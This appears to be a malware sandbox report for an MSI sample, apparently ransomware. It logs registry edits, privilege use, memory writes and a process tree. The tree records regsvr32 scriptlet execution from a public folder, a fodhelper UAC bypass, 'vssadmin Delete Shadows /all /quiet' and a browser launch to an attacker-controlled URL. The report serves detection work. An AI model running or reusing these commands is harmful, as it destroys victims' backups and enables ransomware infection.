\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4} MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ = "IProcessLauncher2" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D9AA3288-4EA7-4E67-AE60-D18EADCB923D}\NumMethods\ = "4" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{08D832B9-D2FD-481F-98CF-904D00DF63CC}\VersionIndependentProgID MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF419FF9-90BE-4D9F-B410-A789F90E5A7C}\Elevation MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\Software\Classes\AppID\{1FCBE96C-1697-43AF-9140-2897C7C69767} setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\TypeLib\ setup.exe -
Suspicious behavior: EnumeratesProcesses 34 IoCs
Processes:
msiexec.exeMsiExec.exemsedge.exemsedge.exeidentity_helper.exemsedge.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exepid process 4628 msiexec.exe 4628 msiexec.exe 2364 MsiExec.exe 2364 MsiExec.exe 4980 msedge.exe 4980 msedge.exe 3124 msedge.exe 3124 msedge.exe 3512 identity_helper.exe 3512 identity_helper.exe 5480 msedge.exe 5480 msedge.exe 5480 msedge.exe 5480 msedge.exe 6000 MicrosoftEdgeUpdate.exe 6000 MicrosoftEdgeUpdate.exe 6000 MicrosoftEdgeUpdate.exe 6000 MicrosoftEdgeUpdate.exe 6000 MicrosoftEdgeUpdate.exe 6000 MicrosoftEdgeUpdate.exe 5256 MicrosoftEdgeUpdate.exe 5256 MicrosoftEdgeUpdate.exe 5256 MicrosoftEdgeUpdate.exe 5256 MicrosoftEdgeUpdate.exe 1852 MicrosoftEdgeUpdate.exe 1852 MicrosoftEdgeUpdate.exe 464 MicrosoftEdgeUpdate.exe 464 MicrosoftEdgeUpdate.exe 3108 MicrosoftEdgeUpdate.exe 3108 MicrosoftEdgeUpdate.exe 3108 MicrosoftEdgeUpdate.exe 3108 MicrosoftEdgeUpdate.exe 3172 MicrosoftEdgeUpdate.exe 3172 MicrosoftEdgeUpdate.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
MsiExec.exepid process 2364 MsiExec.exe 2364 MsiExec.exe 2364 MsiExec.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
msedge.exepid process 3124 msedge.exe 3124 msedge.exe 3124 msedge.exe 3124 msedge.exe 3124 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exevssvc.exedescription pid process Token: SeShutdownPrivilege 5112 msiexec.exe Token: SeIncreaseQuotaPrivilege 5112 msiexec.exe Token: SeSecurityPrivilege 4628 msiexec.exe Token: SeCreateTokenPrivilege 5112 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 5112 msiexec.exe Token: SeLockMemoryPrivilege 5112 msiexec.exe Token: SeIncreaseQuotaPrivilege 5112 msiexec.exe Token: SeMachineAccountPrivilege 5112 msiexec.exe Token: SeTcbPrivilege 5112 msiexec.exe Token: SeSecurityPrivilege 5112 msiexec.exe Token: SeTakeOwnershipPrivilege 5112 msiexec.exe Token: SeLoadDriverPrivilege 5112 msiexec.exe Token: SeSystemProfilePrivilege 5112 msiexec.exe Token: SeSystemtimePrivilege 5112 msiexec.exe Token: SeProfSingleProcessPrivilege 5112 msiexec.exe Token: SeIncBasePriorityPrivilege 5112 msiexec.exe Token: SeCreatePagefilePrivilege 5112 msiexec.exe Token: SeCreatePermanentPrivilege 5112 msiexec.exe Token: SeBackupPrivilege 5112 msiexec.exe Token: SeRestorePrivilege 5112 msiexec.exe Token: SeShutdownPrivilege 5112 msiexec.exe Token: SeDebugPrivilege 5112 msiexec.exe Token: SeAuditPrivilege 5112 msiexec.exe Token: SeSystemEnvironmentPrivilege 5112 msiexec.exe Token: SeChangeNotifyPrivilege 5112 msiexec.exe Token: SeRemoteShutdownPrivilege 5112 msiexec.exe Token: SeUndockPrivilege 5112 msiexec.exe Token: SeSyncAgentPrivilege 5112 msiexec.exe Token: SeEnableDelegationPrivilege 5112 msiexec.exe Token: SeManageVolumePrivilege 5112 msiexec.exe Token: SeImpersonatePrivilege 5112 msiexec.exe Token: SeCreateGlobalPrivilege 5112 msiexec.exe Token: SeBackupPrivilege 4756 vssvc.exe Token: SeRestorePrivilege 4756 vssvc.exe Token: SeAuditPrivilege 4756 vssvc.exe Token: SeBackupPrivilege 4628 msiexec.exe Token: SeRestorePrivilege 4628 msiexec.exe Token: SeRestorePrivilege 4628 msiexec.exe Token: SeTakeOwnershipPrivilege 4628 msiexec.exe Token: SeRestorePrivilege 4628 msiexec.exe Token: SeTakeOwnershipPrivilege 4628 msiexec.exe Token: SeRestorePrivilege 4628 msiexec.exe Token: SeTakeOwnershipPrivilege 4628 msiexec.exe Token: SeRestorePrivilege 4628 msiexec.exe Token: SeTakeOwnershipPrivilege 4628 msiexec.exe Token: SeRestorePrivilege 4628 msiexec.exe Token: SeTakeOwnershipPrivilege 4628 msiexec.exe Token: SeRestorePrivilege 4628 msiexec.exe Token: SeTakeOwnershipPrivilege 4628 msiexec.exe Token: SeRestorePrivilege 4628 msiexec.exe Token: SeTakeOwnershipPrivilege 4628 msiexec.exe Token: SeRestorePrivilege 4628 msiexec.exe Token: SeTakeOwnershipPrivilege 4628 msiexec.exe Token: SeRestorePrivilege 4628 msiexec.exe Token: SeTakeOwnershipPrivilege 4628 msiexec.exe Token: SeRestorePrivilege 4628 msiexec.exe Token: SeTakeOwnershipPrivilege 4628 msiexec.exe Token: SeRestorePrivilege 4628 msiexec.exe Token: SeTakeOwnershipPrivilege 4628 msiexec.exe Token: SeRestorePrivilege 4628 msiexec.exe Token: SeTakeOwnershipPrivilege 4628 msiexec.exe Token: SeRestorePrivilege 4628 msiexec.exe Token: SeTakeOwnershipPrivilege 4628 msiexec.exe Token: SeRestorePrivilege 4628 msiexec.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
Processes:
msiexec.exemsedge.exepid process 5112 msiexec.exe 5112 msiexec.exe 3124 msedge.exe 3124 msedge.exe 3124 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msiexec.exesihost.exesvchost.exetaskhostw.exeMsiExec.execmd.exemsedge.exedescription pid process target process PID 4628 wrote to memory of 2220 4628 msiexec.exe srtasks.exe PID 4628 wrote to memory of 2220 4628 msiexec.exe srtasks.exe PID 4628 wrote to memory of 2364 4628 msiexec.exe MsiExec.exe PID 4628 wrote to memory of 2364 4628 msiexec.exe MsiExec.exe PID 2776 wrote to memory of 2960 2776 sihost.exe regsvr32.exe PID 2776 wrote to memory of 2960 2776 sihost.exe regsvr32.exe PID 2800 wrote to memory of 1728 2800 svchost.exe regsvr32.exe PID 2800 wrote to memory of 1728 2800 svchost.exe regsvr32.exe PID 2872 wrote to memory of 3728 2872 taskhostw.exe regsvr32.exe PID 2872 wrote to memory of 3728 2872 taskhostw.exe regsvr32.exe PID 2364 wrote to memory of 5076 2364 MsiExec.exe cmd.exe PID 2364 wrote to memory of 5076 2364 MsiExec.exe cmd.exe PID 5076 wrote to memory of 3124 5076 cmd.exe msedge.exe PID 5076 wrote to memory of 3124 5076 cmd.exe msedge.exe PID 3124 wrote to memory of 4440 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 4440 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 2076 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 4980 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 4980 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 1784 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 1784 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 1784 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 1784 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 1784 3124 msedge.exe msedge.exe PID 3124 wrote to memory of 1784 3124 msedge.exe msedge.exe -
System policy modification 1 TTPs 4 IoCs
Processes:
setup.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} = "1" setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\ setup.exe
Processes
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn2⤵
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\9180fe1ea22b07841146ba483d454faf092c8cd9fed14222a08b7392cda2e7be.msi1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn2⤵
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn2⤵
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 07A44DD5F6E1FC79B82242F6378E99152⤵
- Modifies extensions of user files
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.execmd /c "start microsoft-edge:http://30ccb26874meemybio.cryless.info/meemybio^&1^&39353836^&68^&375^&22190413⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://30ccb26874meemybio.cryless.info/meemybio&1&39353836&68&375&22190414⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9ac1946f8,0x7ff9ac194708,0x7ff9ac1947185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5168 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4028 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff64f125460,0x7ff64f125470,0x7ff64f1254806⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4944 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1044 /prefetch:25⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1044 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5796 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7020 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5988 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,14526703820584816760,18315573325356551664,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5564 /prefetch:85⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe"1⤵
-
C:\Program Files (x86)\Microsoft\Edge\MSEdgeRecovery\scoped_dir5904_1329636601\msedgerecovery.exe"C:\Program Files (x86)\Microsoft\Edge\MSEdgeRecovery\scoped_dir5904_1329636601\msedgerecovery.exe" --appguid={56EB18F8-B008-4CBD-B6D2-8C97FE7E9062} --browser-version=92.0.902.67 --sessionid={8f68ca89-0da3-4b73-bb5e-2999c6c63746} --system2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\MSEdgeRecovery\scoped_dir5904_1329636601\MicrosoftEdgeUpdateSetup.exe"C:\Program Files (x86)\Microsoft\Edge\MSEdgeRecovery\scoped_dir5904_1329636601\MicrosoftEdgeUpdateSetup.exe" /install "runtime=true&needsadmin=true" /installsource chromerecovery /silent3⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\Temp\EU33B4.tmp\MicrosoftEdgeUpdate.exe" /install "runtime=true&needsadmin=true" /installsource chromerecovery /silent4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
